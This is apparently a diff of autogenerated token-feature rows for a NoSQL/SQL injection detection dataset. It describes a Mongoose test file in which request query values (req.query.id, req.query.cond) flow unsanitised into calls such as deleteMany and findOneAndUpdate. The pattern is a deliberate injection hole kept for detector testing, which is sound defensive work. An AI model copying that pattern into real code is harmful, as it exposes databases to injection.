autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | return of function getQueryConstructor | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | return of function getQueryConstructor | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:2:108:2 | return of function getQueryConstructor | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:11:106:29 | getQueryConstructor | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:11:106:29 | getQueryConstructor | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:11:106:29 | getQueryConstructor | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:11:106:29 | getQueryConstructor | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:11:106:29 | getQueryConstructor | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:11:106:29 | getQueryConstructor | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:11:106:29 | getQueryConstructor | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:106:11:106:29 | getQueryConstructor | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:10:107:17 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:10:107:17 | Mongoose | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:10:107:17 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:10:107:17 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:10:107:23 | Mongoose.Query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:10:107:23 | Mongoose.Query | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:10:107:23 | Mongoose.Query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:10:107:23 | Mongoose.Query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:19:107:23 | Query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:19:107:23 | Query | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:19:107:23 | Query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:107:19:107:23 | Query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:6 | C | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:6 | C | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:6 | C | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:6 | C | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:30 | C | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:30 | C | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:30 | C | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:30 | C | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:30 | C = get ... uctor() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:30 | C = get ... uctor() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:30 | C = get ... uctor() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:6:110:30 | C = get ... uctor() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:28 | getQueryConstructor | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:28 | getQueryConstructor | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:28 | getQueryConstructor | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:28 | getQueryConstructor | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:30 | exceptional return of getQuer ... uctor() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:30 | exceptional return of getQuer ... uctor() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:30 | exceptional return of getQuer ... uctor() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:30 | exceptional return of getQuer ... uctor() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:30 | getQuer ... uctor() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:30 | getQuer ... uctor() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:30 | getQuer ... uctor() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:110:10:110:30 | getQuer ... uctor() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:2:111:19 | exceptional return of new C(X, Y, query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:2:111:19 | exceptional return of new C(X, Y, query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:2:111:19 | exceptional return of new C(X, Y, query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:2:111:19 | exceptional return of new C(X, Y, query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:2:111:19 | new C(X, Y, query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:2:111:19 | new C(X, Y, query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:2:111:19 | new C(X, Y, query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:2:111:19 | new C(X, Y, query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:6:111:6 | C | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:6:111:6 | C | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:6:111:6 | C | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:6:111:6 | C | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:8:111:8 | X | CalleeFlexibleAccessPath | C | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:8:111:8 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:8:111:8 | X | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2868,6 +14405,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:14:111:18 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:14:111:18 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:111:14:111:18 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:26 | Documen ... dUpdate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:26 | Documen ... dUpdate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:26 | Documen ... dUpdate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:26 | Documen ... dUpdate | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:53 | Documen ... () { }) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:53 | Documen ... () { }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:53 | Documen ... () { }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:53 | Documen ... () { }) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:53 | exceptional return of Documen ... () { }) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:53 | exceptional return of Documen ... () { }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:53 | exceptional return of Documen ... () { }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:2:113:53 | exceptional return of Documen ... () { }) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:11:113:26 | findOneAndUpdate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:11:113:26 | findOneAndUpdate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:11:113:26 | findOneAndUpdate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:11:113:26 | findOneAndUpdate | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:28:113:28 | X | CalleeFlexibleAccessPath | Document.findOneAndUpdate | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:28:113:28 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:28:113:28 | X | calleeImports | mongoose | @@ -2884,6 +14441,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:31:113:35 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:31:113:35 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:31:113:35 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:37 | this | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:37 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:37 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:37 | this | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | exceptional return of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | function () { } | CalleeFlexibleAccessPath | Document.findOneAndUpdate | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | function () { } | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | function () { } | calleeImports | mongoose | @@ -2892,6 +14461,94 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | function () { } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | function () { } | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | function () { } | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:113:38:113:52 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:7 | id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:7 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:7 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:7 | id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:22 | id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:22 | id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:22 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:22 | id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:22 | id = req.query.id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:22 | id = req.query.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:22 | id = req.query.id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:6:115:22 | id = req.query.id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:13 | req | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:13 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:13 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:13 | req | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:19 | req.query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:19 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:19 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:19 | req.query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:22 | req.query.id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:22 | req.query.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:22 | req.query.id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:11:115:22 | req.query.id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:15:115:19 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:15:115:19 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:15:115:19 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:15:115:19 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:21:115:22 | id | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:21:115:22 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:21:115:22 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:21:115:22 | id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:28 | cond | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:28 | cond | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:28 | cond | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:28 | cond | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:45 | cond | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:45 | cond | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:45 | cond | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:45 | cond | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:45 | cond = ... ry.cond | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:45 | cond = ... ry.cond | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:45 | cond = ... ry.cond | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:25:115:45 | cond = ... ry.cond | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:34 | req | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:34 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:34 | req | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:40 | req.query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:40 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:40 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:40 | req.query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:45 | req.query.cond | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:45 | req.query.cond | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:45 | req.query.cond | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:32:115:45 | req.query.cond | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:36:115:40 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:36:115:40 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:36:115:40 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:36:115:40 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:42:115:45 | cond | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:42:115:45 | cond | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:42:115:45 | cond | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:115:42:115:45 | cond | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:20 | Document.deleteMany | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:20 | Document.deleteMany | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:20 | Document.deleteMany | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:20 | Document.deleteMany | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:26 | Documen ... y(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:26 | Documen ... y(cond) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:26 | Documen ... y(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:26 | Documen ... y(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:26 | exceptional return of Documen ... y(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:26 | exceptional return of Documen ... y(cond) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:26 | exceptional return of Documen ... y(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:2:116:26 | exceptional return of Documen ... y(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:11:116:20 | deleteMany | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:11:116:20 | deleteMany | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:11:116:20 | deleteMany | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:11:116:20 | deleteMany | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:22:116:25 | cond | CalleeFlexibleAccessPath | Document.deleteMany | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:22:116:25 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:22:116:25 | cond | calleeImports | mongoose | @@ -2900,6 +14557,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:22:116:25 | cond | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:22:116:25 | cond | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:116:22:116:25 | cond | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:19 | Document.deleteOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:19 | Document.deleteOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:19 | Document.deleteOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:19 | Document.deleteOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:25 | Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:25 | Documen ... e(cond) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:25 | Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| 